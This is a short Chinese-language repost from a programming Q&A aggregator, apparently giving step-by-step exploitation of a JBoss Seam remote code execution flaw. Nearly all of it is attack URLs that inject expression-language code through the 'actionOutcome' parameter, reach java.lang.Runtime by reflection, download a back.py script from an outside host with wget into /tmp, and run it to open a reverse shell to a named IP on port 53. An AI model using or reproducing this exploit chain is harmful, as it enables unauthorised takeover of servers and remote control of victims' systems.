jboss seam 远程执行漏洞利用步骤

jboss seam 远程执行漏洞利用步骤,第1张

概述目标:http://www.ip.com http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478 http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName ('java

目标:http://www.ip.com
http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478
http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6]}

http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime')}.getDeclaredMethods()[13]}

http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[13].invoke(Expressions.getClass().forname

('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),'wget http://www.bitpress.com.cn/uploads/back.py -O

/tmp/back.py')}


home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{Expressions.getClass().forname

('java.lang.Runtime').getDeclaredMethods()[13].invoke(Expressions.getClass().forname

('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),'perl /tmp/back.py 118.122.176.42 53')}

总结

以上是内存溢出为你收集整理的jboss seam 远程执行漏洞利用步骤全部内容,希望文章能够帮你解决jboss seam 远程执行漏洞利用步骤所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/1285867.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-06-09
下一篇 2022-06-09

发表评论

登录后才能评论

评论列表(0条)

保存